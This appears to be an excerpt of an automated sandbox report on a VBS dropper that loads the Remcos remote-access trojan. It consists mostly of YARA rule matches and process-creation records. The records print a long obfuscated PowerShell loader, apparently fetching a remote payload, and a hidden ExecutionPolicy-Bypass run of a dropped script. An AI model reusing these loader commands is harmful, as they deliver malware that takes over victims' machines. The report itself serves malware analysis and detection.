                    Source: 13.2.powershell.exe.1eb5d86a448.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 23.2.powershell.exe.23e13f69f58.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 23.2.powershell.exe.23e13f69f58.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 23.2.powershell.exe.23e13f69f58.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 20.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 20.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 20.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 20.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 20.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 20.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 23.2.powershell.exe.23e13f69f58.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 23.2.powershell.exe.23e13f69f58.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 13.2.powershell.exe.1eb5d86a448.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 13.2.powershell.exe.1eb5d86a448.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 18.2.powershell.exe.19971c2ad28.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 18.2.powershell.exe.19971c2ad28.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0000000D.00000002.2594598048.000001EB5D6E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000012.00000002.2661640004.0000019971901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000000D.00000002.2594598048.000001EB5D360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000017.00000002.2806942257.0000023E13C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 1600, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 6764, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                    Source: Process Memory Space: powershell.exe PID: 6764, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 3796, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 3796, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                    Source: Process Memory Space: powershell.exe PID: 3796, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Wscript starts Powershell (via cmd or directly)
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'EQ' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'EQ' + [char]65 + 'Jw' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + 'BY' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'VQB1' + [char]65 + 'Gg' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Gg' + [char]65 + 'd' + [char]65 + 'B0' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'cw' + [char]65 + '6' + [char]65 + 'C8' + [char]65 + 'LwB3' + [char]65 + 'Hc' + [char]65 + 'dw' + [char]65 + 'u' + [char]65 + 'Gc' + [char]65 + 'cgBh' + [char]65 + 'HQ' + [char]65 + 'aQB0' + [char]65 + 'HU' + [char]65 + 'Z' + [char]65 + 'Bl' + [char]65 + 'HM' + [char]65 + 'ZQBl' + [char]65 + 'Gs' + [char]65 + 'ZQBy' + [char]65 + 'HM' + [char]65 + 'LgBj' + [char]65 + 'G8' + [char]65 + 'bQ' + [char]65 + 'v' + [char]65 + 'Hc' + [char]65 + 'c' + [char]65 + '' + [char]65 + 't' + [char]65 + 'Gk' + [char]65 + 'bgBj' + [char]65 + 'Gw' + [char]65 + 'dQBk' + [char]65 + 'GU' + [char]65 + 'cw' + [char]65 + 'v' + [char]65 + 'GM' + [char]65 + 'dQBz' + [char]65 + 'HQ' + [char]65 + 'bwBt' + [char]65 + 'Gk' + [char]65 + 'egBl' + [char]65 + 'C8' + [char]65 + 'YwBz' + [char]65 + 'HM' + [char]65 + 'LwBi' + [char]65 + 'GQ' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'F0' + [char]65 + 'XQBb' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBv' + [char]65 + 'Fs' + [char]65 + 'I' + [char]65 + '' + [char]65 + 's' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'b' + [char]65 + 'Bs' + [char]65 + 'HU' + [char]65 + 'bg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'Gs' + [char]65 + 'bwB2' + [char]65 + 'G4' + [char]65 + 'SQ' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Ek' + [char]65 + 'VgBG' + [char]65 + 'HI' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bk' + [char]65 + 'G8' + [char]65 + 'a' + [char]65 + 'B0' + [char]65 + 'GU' + [char]65 + 'TQB0' + [char]65 + 'GU' + [char]65 + 'Rw' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'Jw' + [char]65 + 'x' + [char]65 + 'HM' + [char]65 + 'cwBh' + [char]65 + 'Gw' + [char]65 + 'Qw' + [char]65 + 'u' + [char]65 + 'DM' + [char]65 + 'eQBy' + [char]65 + 'GE' + [char]65 + 'cgBi' + [char]65 + 'Gk' + [char]65 + 'T' + [char]65 + 'Bz' + [char]65 + 'HM' + [char]65 + 'YQBs' + [char]65 + 'EM' + [char]65 + 'Jw' + [char]65 + 'o' + [char]65 + 'GU' + [char]65 + 'c' + [char]65 + 'B5' + [char]65 + 'FQ' + [ch
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'EQ' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'EQ' + [char]65 + 'Jw' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + 'BY' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'VQB1' + [char]65 + 'Gg' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Gg' + [char]65 + 'd' + [char]65 + 'B0' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'cw' + [char]65 + '6' + [char]65 + 'C8' + [char]65 + 'LwB3' + [char]65 + 'Hc' + [char]65 + 'dw' + [char]65 + 'u' + [char]65 + 'Gc' + [char]65 + 'cgBh' + [char]65 + 'HQ' + [char]65 + 'aQB0' + [char]65 + 'HU' + [char]65 + 'Z' + [char]65 + 'Bl' + [char]65 + 'HM' + [char]65 + 'ZQBl' + [char]65 + 'Gs' + [char]65 + 'ZQBy' + [char]65 + 'HM' + [char]65 + 'LgBj' + [char]65 + 'G8' + [char]65 + 'bQ' + [char]65 + 'v' + [char]65 + 'Hc' + [char]65 + 'c' + [char]65 + '' + [char]65 + 't' + [char]65 + 'Gk' + [char]65 + 'bgBj' + [char]65 + 'Gw' + [char]65 + 'dQBk' + [char]65 + 'GU' + [char]65 + 'cw' + [char]65 + 'v' + [char]65 + 'GM' + [char]65 + 'dQBz' + [char]65 + 'HQ' + [char]65 + 'bwBt' + [char]65 + 'Gk' + [char]65 + 'egBl' + [char]65 + 'C8' + [char]65 + 'YwBz' + [char]65 + 'HM' + [char]65 + 'LwBi' + [char]65 + 'GQ' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'F0' + [char]65 + 'XQBb' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBv' + [char]65 + 'Fs' + [char]65 + 'I' + [char]65 + '' + [char]65 + 's' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'b' + [char]65 + 'Bs' + [char]65 + 'HU' + [char]65 + 'bg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'Gs' + [char]65 + 'bwB2' + [char]65 + 'G4' + [char]65 + 'SQ' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Ek' + [char]65 + 'VgBG' + [char]65 + 'HI' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bk' + [char]65 + 'G8' + [char]65 + 'a' + [char]65 + 'B0' + [char]65 + 'GU' + [char]65 + 'TQB0' + [char]65 + 'GU' + [char]65 + 'Rw' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'Jw' + [char]65 + 'x' + [char]65 + 'HM' + [char]65 + 'cwBh' + [char]65 + 'Gw' + [char]65 + 'Qw' + [char]65 + 'u' + [char]65 + 'DM' + [char]65 + 'eQBy' + [char]65 + 'GE' + [char]65 + 'cgBi' + [char]65 + 'Gk' + [char]65 + 'T' + [char]65 + 'Bz' + [char]65 + 'HM' + [char]65 + 'YQBs' + [char]65 + 'EM' + [char]65 + 'Jw' + [char]65 + 'o' + [char]65 + 'GU' + [char]65 + 'c' + [char]65 + 'B5' + [char]65 + 'FQ' + [chJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,20_2_004167EF
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD345A16C92_2_00007FFD345A16C9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD345B8EE14_2_00007FFD345B8EE1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD345B702D4_2_00007FFD345B702D
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD34680B094_2_00007FFD34680B09
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD345BA8EC5_2_00007FFD345BA8EC
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD345B85AB5_2_00007FFD345B85AB
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD345B8E055_2_00007FFD345B8E05
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD345B6F5C5_2_00007FFD345B6F5C
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD345B6F155_2_00007FFD345B6F15
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD345BABD35_2_00007FFD345BABD3
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD345B5BFA5_2_00007FFD345B5BFA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD345AADD06_2_00007FFD345AADD0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD345A8E056_2_00007FFD345A8E05
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD345ABA8C6_2_00007FFD345ABA8C
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD3468149313_2_00007FFD34681493
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD345B3CD218_2_00007FFD345B3CD2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0043706A20_2_0043706A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0041400520_2_00414005
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0043E11C20_2_0043E11C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_004541D920_2_004541D9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_004381E820_2_004381E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0041F18B20_2_0041F18B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0044627020_2_00446270
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0043E34B20_2_0043E34B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_004533AB20_2_004533AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0042742E20_2_0042742E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0043756620_2_00437566
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0043E5A820_2_0043E5A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_004387F020_2_004387F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0043797E20_2_0043797E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_004339D720_2_004339D7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0044DA4920_2_0044DA49
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00427AD720_2_00427AD7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0041DBF320_2_0041DBF3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00427C4020_2_00427C40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00437DB320_2_00437DB3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00435EEB20_2_00435EEB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0043DEED20_2_0043DEED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00426E9F20_2_00426E9F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402093 appears 50 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00401E65 appears 34 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434E70 appears 54 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434801 appears 41 times
                    Source: SKMBT_77122012816310TD0128_17311_XLS.vbsInitial sample: Strings found which are bigger than 50
                    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 29626
                    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 29626Jump to behavior
                    Source: 18.2.powershell.exe.19971c2ad28.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 18.2.powershell.exe.19971c2ad28.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 18.2.powershell.exe.19971c2ad28.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 13.2.powershell.exe.1eb5d86a448.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 13.2.powershell.exe.1eb5d86a448.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 13.2.powershell.exe.1eb5d86a448.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 23.2.powershell.exe.23e13f69f58.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 23.2.powershell.exe.23e13f69f58.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 23.2.powershell.exe.23e13f69f58.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 20.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 20.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 20.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 20.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 20.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 20.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 23.2.powershell.exe.23e13f69f58.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 23.2.powershell.exe.23e13f69f58.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 13.2.powershell.exe.1eb5d86a448.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 13.2.powershell.exe.1eb5d86a448.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 18.2.powershell.exe.19971c2ad28.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 18.2.powershell.exe.19971c2ad28.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
